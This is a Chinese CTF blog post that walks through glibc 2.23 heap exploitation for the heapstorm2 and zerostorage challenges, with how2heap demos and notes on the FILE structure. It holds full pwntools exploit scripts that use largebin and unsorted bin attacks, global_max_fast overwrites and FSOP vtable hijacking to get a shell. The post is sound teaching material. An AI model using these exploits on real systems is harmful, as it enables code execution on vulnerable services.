程序只有一个off_by_null,所以就只能shrink freed chunk然后构造overlap了(提醒一下自己以后shrink时一定要记得如果chunk被放回了bin链然后再用fit匹配出来时会触发unlink,如果不设置好fake prev_size,由于前面那个size已经被改了所以unlink检查时就会崩掉,免得老在这坑住)

然后后面的思路就是在random_area的上方利用largebin attack写上一个fakesize构造fake chunk,并在对应bk的地方也写上下图中victim的地址,首先是为了下一步操作时有个可写地址,但其实这个bk还有大用处

largebin attack之后利用overlap将映射区域对应fake chunk的固定地址写在新链入unsortedbin中的chunk的bk上,为了把random_area的内存calloc出来。这个过程可能有点绕,画个图帮自己理解一下(这里unsortedbin上的chunk是largebin attack之后放上去的,为了方便我就干脆画在一起了)

当我们利用largebin attack写上值之后,我们在fakechunk上已经有了size和bk,此时的bk是victim

但是由于PIE的映射是0x5?开头的地址,也就是说我们能接着calloc出来的chunk大小不能超过0x50,可用的地方还得再缩小之后减0xC。而且当mask损坏的时候如果指针都不变,将会没有办法继续进行操作(而且这块区域是被初始化过的,好像不能直接在操作中给mask赋值,不过利用那个字符串去计算一个说不定可以),我当时想尽办法想通过这个0x50的chunk实现exploit但是始终不行,所以就又去参考了师傅们的WP,发现师傅们是通过再构造一个再calloc出来的(跪),瞬间就好像又有思路了

我们写的bk是vicitm,所以calloc这个0x5?的chunk之后victim又被放到unsortedbin上面去了,但是如果这个victim chunk内容是我们通过overlap控制的话,就可以再接着控制其bk然后再calloc一个fake chunk,而且此时fakechunk的构造更简单了因为我们已经有了一个0x5?的chunk,可以直接写一个大一点的fakesize

在接着试图calloc random_area时,我们calloc出vicitm之后,还需要把fake chunk的bk再设置一下,因为unsortedbin卸下时需要可写地址,update那个0x5?的chunk就行(写的这个地址因为是libc的,所以在我这个利用中也发挥了很大的用处)

calloc出来这块mem之后,这里的值就全都被置零了,相当于列表清空..效果大概是这样的:

1582946763810

我这里没有清完,其实还可以清的更空一些,不过也够了。我的size设置的位置偏了8 23333因为当时怕影响到后面的数据

可以看到我们calloc出这块mem的时候,因为是先calloc再通过异或指针存到记录上,所以calloc之后的mask全都成0了,存上去的也就是真实值(0x133703d8 0xf0)

然后通过这个记录填上view需要的固定异或值,并填上我们前面写的libc地址的位置,还有size,直接读出来之后有任意地址写了就完事了!

我选择的是写__malloc_hookone_gadget,我看师傅们用的是__free_hook到system然后free一个有/bin/sh字符串的chunk,好像师傅们的更稳定一些,不过到后面任意地址读写之后就简单很多了也不多废话了

这里还记一个看师傅们博客看到的操作,就是largebin attack中如果我们能控制最开始的那个corrupt chunk就能多次利用进行largebin attack

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './heapstorm2' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
global_max_fast=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
fastbin addree to size: (offset_to_fastbinY/8+2)<<(4 or 3)
largebin chunksize:0x410|0x450|0x490|0x4C0...
'''
# todo here
def alloc(size):
p.recvuntil('Command: ')
p.sendline('1')
p.recvuntil('Size: ')
p.sendline(str(size))
def update(idx,size,content):
p.recvuntil('Command: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(size))
p.recvuntil('Content: ')
p.sendline(content)
def delete(idx):
p.recvuntil('Command: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))
def view(idx):
p.recvuntil('Command: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))

alloc(0x18)#0 for off_by_null
alloc(0xC30)#1 for split
alloc(0x18)#2 for merge
alloc(0x18)#3 guard

payload='\x33'*0xBF0+p64(0xC00)#set fake prev_size
update(1,len(payload),payload)
delete(1)#(0,,2,3)
update(0,0x18-0xc,'a'*(0x18-0xc))#off_bu_null 0xC40->0xC00

#split 1 now
alloc(0xf0)#1 0x100 chunk
alloc(0x400)#4 0x410 chunk large
alloc(0x1f0)#5 0x200 chunk
alloc(0x410)#6 0x420 chunk large
#1 remain:0x131

delete(1)#(0,,2,3,4,5,6) for unlink
delete(2)#(0,,,3,4,5,6) merge&overlap

alloc(0xC50)#1 now chunk 1 overlap (4,5,6,remain) & remain to smallbin

#recover 0x410chunk's size & other chunk's size because of calloc--↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#------------------------------------------------------------------↑

#alloc(0x410)#2 !!!!!!!need a overlap chunk for victim do not alloc one like me before

delete(4)#(0,1,,3,,5,6) overlapped chunk 4 to ub
alloc(0x430)#2 set chunk 4 to largebin

#overwrite chunk 4 ------------------------↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#mmap region above the random area
payload+=p64(0)+p64(0x133707d8-0x20)
update(1,len(payload),payload)#set for largebin attack
#------------------------------------------↑

delete(6)#(0,1,2,3,,5) 0x420chunk to ub
alloc(0x440)#4 0x420 chunk to largebin(largebin attack)

#reset 0x200&0x130 chunk's prev_inuse---------↓
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)#No other meanings,just ctrl+c ctrl+v
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+='a'*0x410
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#---------------------------------------------↑
#gdb.attach(p,'brva 0x113c')
delete(5)#(0,1,2,3,4)#set 0x200 chunk to ub

#reset 0x200 chunk's bk-----------------------↓
fake_chunk=0x133707c0
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+=p64(0)+p64(0x133707c3-0x10)
payload+=p64(0)+p64(0x133707d8-0x20)
payload+='a'*0x3e0
payload+=p64(0)+p64(0x201)
payload+=p64(0)+p64(fake_chunk)
update(1,len(payload),payload)
#---------------------------------------------↑

alloc(0x1f0)#5 after this we can alloc the first 0x5? chunk
#an we need to pass the the chunk_is_mmapped check in _libc_malloc randomly XD
loginfo()

alloc(0x40)#6 get first mmap region chunk out
update(6,0x18,p64(0x100)+p64(0)+p64(0x133707b0))
#set another fake size&bk,and bk is used for writing libc address:(bck->fd = unsorted_chunks (av))

#reset 0x420 chunk's bk again----------------↓
#because we write the 0x420chunk's address(vicitm) on the bk of 0x5? chunk
#after we malloc out the 0x5? chunk,the 0x420 chunk back to unsortedbin again
#we can control the chunk's bk for malloc out the random_area next time
fake_chunk=0x133707c8
payload='a'*0xf0
payload+=p64(0)+p64(0x411)
payload+='a'*0x400
payload+=p64(0)+p64(0x201)
payload+='a'*0x1f0
payload+=p64(0)+p64(0x421)
payload+=p64(0)+p64(fake_chunk)
payload+='a'*0x400
payload+=p64(0)+p64(0x131)
update(1,len(payload),payload)
#--------------------------------------------↑

#We can allocate a 0x100 chunk at the random_area! Play our leak&write game now!!!!!!!!!!!!!!!!!!
alloc(0x410)#7
alloc(0xf0)#8

#Write the libaddress location&view key at index 0----↓
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x133707c0)+p64(8)
update(8,len(payload),payload)
#-----------------------------------------------------↑
view(0)
p.recvuntil('Chunk[0]: ')
libc_base=u64(p.recv(8))-0x3c4b78
loginfo('libc_base',libc_base)


#__malloc_hook to index 0---------------------↓
payload=p64(0)*5+p64(0)*2
payload+=p64(0x0)+p64(0x13377331)
payload+=p64(0x3c4b10+libc_base)+p64(8+0xc)
update(8,len(payload),payload)
#---------------------------------------------↑

update(0,8,p64(0x4526a+libc_base))
alloc(0x666)

p.interactive()

how2heap - unsorted_bin&zerostorage

ubuntu16.04 libc2.23

unsorted_bin_into_stack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

int main() {
intptr_t stack_buffer[4] = {0};

fprintf(stderr, "This technique only works with disabled tcache-option for glibc, see build_glibc.sh for build instructions.\n");

fprintf(stderr, "Allocating the victim chunk\n");
intptr_t* victim = malloc(0x100);

fprintf(stderr, "Allocating another chunk to avoid consolidating the top chunk with the small one during the free()\n");
intptr_t* p1 = malloc(0x100);

fprintf(stderr, "Freeing the chunk %p, it will be inserted in the unsorted bin\n", victim);
free(victim);

fprintf(stderr, "Create a fake chunk on the stack");
fprintf(stderr, "Set size for next allocation and the bk pointer to any writable address");
stack_buffer[1] = 0x100 + 0x10;
stack_buffer[3] = (intptr_t)stack_buffer;

//------------VULNERABILITY-----------
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->size and victim->bk pointer\n");
fprintf(stderr, "Size should be different from the next request size to return fake_chunk and need to pass the check 2*SIZE_SZ (> 16 on x64) && < av->system_mem\n");
victim[-1] = 32;
victim[1] = (intptr_t)stack_buffer; // victim->bk is pointing to stack
//------------------------------------

fprintf(stderr, "Now next malloc will return the region of our fake chunk: %p\n", &stack_buffer[2]);
fprintf(stderr, "malloc(0x100): %p\n", malloc(0x100));
}

意思就是unsortedbin上有一个chunk,然后模拟漏洞更改了其size和bk,这样再malloc相同大小的chunk时这块chunk就不会被malloc,会被放到smallbin里面去,其中libc2.23中unsortedbin卸下的操作是:

1
2
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

这里bck就是victim->bk,所以卸下操作基本都是与bk指针相关,与fd无关。这个代码中只需要将栈上对应的size字段和bk设置好即可,0x100chunk被放到smallbin后unsortedbin中情况如图所示

此时可以无限malloc(0x100)都是这个stack chunk,bck始终是他自己

unsorted_bin_attack.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <stdio.h>
#include <stdlib.h>

int main(){
fprintf(stderr, "This technique only works with buffers not going into tcache, either because the tcache-option for "
"glibc was disabled, or because the buffers are bigger than 0x408 bytes. See build_glibc.sh for build "
"instructions.\n");
fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n");
fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");

unsigned long stack_var=0;
fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n");
fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var);

unsigned long *p=malloc(0x410);
fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p);
fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with"
"the first one during the free()\n\n");
malloc(500);

free(p);
fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer "
"point to %p\n",(void*)p[1]);

//------------VULNERABILITY-----------

p[1]=(unsigned long)(&stack_var-2);
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]);

//------------------------------------

malloc(0x410);
fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been "
"rewritten:\n");
fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var);
}

这个的原理也是借助于unsortedbin上的卸链表的操作,当unsortedbin上有chunk,时,卸链表操作有一个:
bck->fd=unsorted_chunks (av);
在这里,我们首先把chunk的bk改成了栈指针,所以在获取bck的时候bck就会是一个栈地址,然后malloc在unsortedbin上成功匹配到chunk之后,即使没有去接着malloc chunk,对应栈地址+2*sizt_t的地方也会填上main_arena的地址,这也是这个利用和上面那个利用不一样(不用修改size字段)的原因

这两个都不难我这里就不debug了,直接撸题吧

zerostorage

程序说实话好像逆起来有点复杂,直接看流程更清晰明了

程序分析(流程)

bss段上存了一个记录结构体数组,这个结构体主要是用来管理对应chunk的,分别记录了表示use_or_not的flag、可用长度还有指针(xor了一个随机的mask,导致真正的指针没有存在bss段)

Insert

找记录数组看还有没有剩余的位置,最多记录0x20个

输入的lenth不能小于0

len>0x1000 calloc(0x1000) read(0x1000)///set ent->len=0x1000
if 0x80<=len<=0x1000 calloc(len) read(len)///set ent->len=len
len<0x80 calloc(0x80) read(len)///set ent->len=len

然后就差不多是读ent->len长度的数据了,这里的比对操作差不多就是为了申请的chunk在0x80~0x1000之间,

update

input(index)

check(index>0x1F,ent->use_or_not)
input(len) check(len>0)
if len>0x1000 a=0x1000 c=0x1000
if 0x80<=len<=0x1000 a=len c=len
if len<0x80 a=0x80 c=len
这个也是为了控制大小在0x80~0x1000之间

if ent->len>=0x80 b=ent->len
else b=0x80

if a!=b realloc(ptr_mask^ent->ptr,a)

readn(ptr,c)
然后更新记录

merge

need ent_num>1
input(fromID) check(fromID>0x1F,mergechunk1.use_or_not)
input(toID) check(toID>0x1F,mergechunk2.use_or_not)
a=0x80,b=0x80
if fromlen+tolen>=0x80 b=fromlen+tolen
if tolen>=0x80 a=tolen

if a==b cpy_len=fromlen
else realloc(to_ptr,b) cpy_len=fromlen
memcpy(chunk_toptr + to_len, from_ptr, cpy_len);
把from的数据拷到新的chunk里对应的位置去

更新一个新的记录
free(from_ptr)
清除掉合并的两个记录

delete

这个就很简单了就是input然后check然后free,并清除掉记录

input(id) check(id>0x1F,use_or_not)
free(ptr) clear record

view

view就是按记录的长度,输出chunk上长度为n的内容

input(id) check(id>0x1F,use_or_not)
write_n

list

输出对应记录的下标和记录下来的长度

漏洞分析

这个题我最开始看了很久主要是因为真的太乱了,特别是前面比来比去的操作,而且我当时没记笔记有点蠢,以后这种比来比去的操作直接记笔记,这样可以知道程序到底是为了干什么

然后漏洞的话基本上第一眼看上去溢出和leak都不行,毕竟什么记录之类的也都在free之后清除了,申请的时候使用的也是calloc,然后再仔细就会发现如果merge中输入的fromID和toID相等的话就会形成UAF,比如先calloc 3个0x90的chunk然后delete第二个,merge(0,0)的话就会把第一个chunk合并成一个0x120的chunk存在记录[1]处,然后free掉这个0x120的chunk,由于是在unsortedbin上所以可以在之前再free一个,设置这个chunk的fd指向那个chunk,再去view的时候就可以leak heap和libc了,而且也可以通过update来更改chunk中的内容

由于这种题是第一次接触,自己也还傻傻不清楚unsortedbin attack怎么用,所以参考了一些师傅们的题解,然后发现这种方法可以用来修改global_max_fast这个变量,然而在我参考的过程中发现,由于原题环境是在ubuntu14系统下,当时还存在一个获取libc地址之后直接获取程序地址的操作,所以原题的思路是在bss段伪造一个堆块,然后把bss给malloc出来,获得mask之后修改指针实现任意地址写。但是在ubuntu16下面这个操作已经不存在了,所以又照着新解学习了很多_IO_FILE的知识

学了FSOP再来分析漏洞,此时已经有了libc地址和heap地址,还更改了global_max_fast,接下来如果使用FSOP的话应该怎么用呢…我第一个想到的还是fastbin attack(写完第一个思路之后回来发现师傅还有一个思路,简直不能再爽23333,所以我这里写了两个解法),之前fastbin attack能修改__malloc_hook主要是因为存在0x7f这个特殊值,但是现在就似乎变得更棘手了一些堆块又不能大于0x1000,又不能小于0x80

….不过果然只要细心一点找还是找的到fake size的,如图

我在stderr对应的FILE中找到了一个0xfb的fakesize,这个本来是FILE的flag值,但是既然你有个0xfb我就不客气的拿下了….distance也是足够的,只要劫持你到我堆上伪造的vtable就完事了

Exploit1

接着上面的想法我成功的跑通了自己的思路奥利给!(还是那句话,用自己的方法写出来真的太开心了23333)

  1. 首先就是先多申请几个chunk,其中一个大小是0x74
  2. merge 0x74的chunk,这时候能merge出来一个0xf0的chunk
  3. 再弄一个merge自己的chunk,此时在unsortedbin链中这个chunk的fd是我们之前0xf0的chunk,bk是unsortedbin,达到leak,而且由于这个chunk是unsortedbin链头,所以这个也刚好用来改global_max_fast
  4. 然后把0xf0的chunk从unsortedbin calloc出来,为了后面的fastbin attack(毕竟是UAF的chunk,我们有两个记录可以用来改它2333)
  5. 把第三步merge自己的chunk也calloc出来,这步只是为了改global_max_fast
  6. delete之前的0xf0的chunk,然后改fd(fastbin attack)
  7. 这里注意再insert的时候就可以把fake vtable放上去了,为了等下用
  8. 再insert就是改写_IO_2_1_stderr_的东西了,注意计算对应于fakechunk的偏移
  9. 退出getshell

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Length of new entry: ')
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def update(id,size,content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
p.recvuntil("Length of entry: ")
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def merge(fromid,toid):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('from Entry ID: ')
p.sendline(str(fromid))
p.recvuntil('to Entry ID: ')
p.sendline(str(toid))
def delete(id):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
def view(id):
p.recvuntil('Your choice: ')
p.sendline('5')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x80,'c'*0x80)#2
insert(0x74,'d'*0x74)#3 这里的chunk是为了merge自己之后能有一个0xfx的size,便于后面利用
insert(0x80,'e'*0x80)#4
insert(0x80,'f'*0x80)#5

delete(4)#这里如果不先delete4的话会因为realloc中free了这块空间从而被double free
merge(3,3)
delete(1)
merge(0,0)

view(1)
p.recvuntil(':\n')
heap_base=my_u64(p.recv(8))-0x1b0
libc_base=my_u64(p.recv(8))-0x3c4b78
loginfo('heap_base',heap_base)

fakechunk_offset=0x3c553b
pad_len=0xcd#到vtable指针的距离


update(1,0x110,p64(0)+p64(libc_base+g_m_f-0x10)+'a'*0x100)
insert(0xe0,'+'*0xe0)
insert(0x110,'*'*0x110)

delete(0)
update(4,0xe8,p64(libc_base+fakechunk_offset)+'0'*0xe0)
insert(0xe0,p64(0)*3+p64(libc_base+0x4526a)+'.'*0xc0)

#这里要计算各种偏移,而且是对fakechunk来说的,所以显得有些繁琐?..没事,getshell天下第一
payload='.'*0x15+p64(0)+p64(1) #满足 _IO_write_ptr(0x28偏移) > _IO_write_base(0x20偏移)
payload=payload.ljust(pad_len,'\x00') #满足0xc0偏移的_mode要<=0
insert(0xe0,(payload+p64(heap_base+0x1c0)).ljust(0xe0,'\xee'))

p.sendline('7')#trigger
p.interactive()

Exploit2

修改global_max_fast之后我本来是只想到了利用fastbin attack,但是发现好像有一个更牛逼的操作:

因为fastbin的限制现在变的特别大了,所以如果我们的chunk足够大的时候可以直接将chunk的地址填到别的地方去而不是fastbin的那个数组…这应该也算是数组越界的一个应用了,太顶了
如下(这是main_arena之后的可写数据段,一下就看到了一些熟悉的东西,而且指不定还有什么可以改,只要咱们的chunk够大2333):

师傅们的操作是改了_IO_list_all,然后在对应chunk上伪造一个FILE,这里说一下写EXP自己踩的几个坑

  1. leak的时候unsortedbin上是有两个chunk的,所以干脆把链尾的那个chunk弄成0x400后面merge的时候可以直接取下来,省去了再insert的步骤,然后把fake_err和fake table都update到0x1000的那个chunk里面去
  2. 前面0x1000的chunk和0x400的chunk直接挨着就好
  3. _IO_list_all指向的是chunk header,但是我们写的时候是从data段开始写的,所以要注意这里少0x10个偏移,前面0x10的数据也用不了

完整EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
# -*- coding: utf-8 -*-
from __future__ import print_function
from pwn import *

binary = './zerostorage' #binary's name here
context.binary = binary #context here
context.log_level='debug'
pty = process.PTY
p = process(binary, aslr = 1, stdin=pty, stdout=pty) #process option here
'''
Host =
Port =
p = remote(Host,Port)
'''
elf = ELF(binary)
libc = elf.libc

my_u64 = lambda x: u64(x.ljust(8, '\0'))
my_u32 = lambda x: u32(x.ljust(4, '\0'))
g_m_f=0x3c67f8
codebase = 0x555555554000
def loginfo(what='',address=0):
log.info("\033[1;36m" + what + '----->' + hex(address) + "\033[0m")

'''libc 2.23 x64
0x45216 execve("/bin/sh", rsp+0x30, environ)constraints: rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)constraints: [rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)constraints: [rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)constraints: [rsp+0x70] == NULL
req = dest - old_top - 4*sizeof(long)
'''
#todo here
def insert(size,content):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Length of new entry: ')
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def update(id,size,content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
p.recvuntil("Length of entry: ")
p.sendline(str(size))
p.recvuntil('Enter your data: ')
p.send(content)
def merge(fromid,toid):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('from Entry ID: ')
p.sendline(str(fromid))
p.recvuntil('to Entry ID: ')
p.sendline(str(toid))
def delete(id):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
def view(id):
p.recvuntil('Your choice: ')
p.sendline('5')
p.recvuntil('Entry ID: ')
p.sendline(str(id))
insert(0x80,'a'*0x80)#0
insert(0x80,'b'*0x80)#1
insert(0x1000,'d'*0x1000)#2
insert(0x3f0,'e'*0x3f0)#3
insert(0x3f0,'f'*0x3f0)#4
insert(0x80,'g'*0x80)#5

delete(3)#delete for leak&merge

delete(1)#delete for merge
merge(0,0)
view(1)#leak

heap_off=-0x1130
libc_off=-0x3c4b78
p.recvuntil(':\n')
heap_base=heap_off+u64(p.recv(8))
libc_base=libc_off+u64(p.recv(8))
loginfo("heapbase",heap_base)
loginfo("libcbase",libc_base)

fake_err=''.ljust(0x10,'\x00')+p64(0)+p64(16)+p64(0)*7#offset-0x10 because '_IO_list_all' will point to the chunk header
fake_err+=p64(libc_base+0x3c5620)+p64(2)+p64(0xffffffffffffffff)+p64(0)+p64(libc_base+0x3c6770)
fake_err=fake_err.ljust(0xc0,'\x00')+p64(0)
fake_err=fake_err.ljust(0xc8,'\x00')+p64(heap_base+0x200)

fake_table=p64(0)*3+p64(libc_base+0x4526a)


update(2,0x1000,(fake_err+fake_table).ljust(0x1000,'\x00'))#update to fake err FILE

merge(4,2)#merge to 0x1410 and unsortedbin have only one chunk now because of the UNLINK

update(1,0x100,p64(0)+p64(libc_base+g_m_f-0x10)+'2'*0xf0)#update for next insert to change global_max_fast

insert(0x110,'\x33'*0x110)#change global_max_fast

delete(0)#delete 0x1410chunk

p.sendline('7')


p.interactive()

FSOP学习

由于刷how2heap时碰到了一题zerostorage,这个题在ubuntu14上由于存在一个offset2lib的攻击,所以在泄露libc地址之后可以get到程序的地址,但是我复现这个题是在ubuntu16下面做的,所以这个攻击方法无效XD,得另寻他路,所以我找到了raycp师傅的这篇文章,上面提到了FSOP这个攻击姿势,理所当然我当然要啃一啃了,顺带借助了一下CTFwiki和师傅的另一篇博客

FILE *

首先来看一下FILE这个结构体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */

struct _IO_marker *_markers;

struct _IO_FILE *_chain;

int _fileno;//fd
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */

#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

/* char* _save_gptr; char* _save_egptr; */

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

_IO_FILE_plus&_IO_jump_t

还有FILE结构体的封装和vtable,当然最最主要的就是这个指针和这个table了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
};
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};

调用链

table中对应函数的调用姿势会尝试着慢慢更新的,现在菜鸡学到的有这几种:

  1. 利用的是在程序调用 exit 后,会遍历 _IO_list_all ,调用 _IO_2_1_stdout_ 下的 vatable_setbuf 函数(wiki)

  2. puts 在源码中实现的函数是_IO_puts,这个函数的操作与 fwrite 的流程大致相同,函数内部同样会调用 vtable 中的_IO_sputn,结果会执行_IO_new_file_xsputn,最后会调用到系统接口 write 函数。(wiki)

  3. printf 调用栈(wiki):

    1
    2
    3
    4
    5
    6
    vfprintf+11
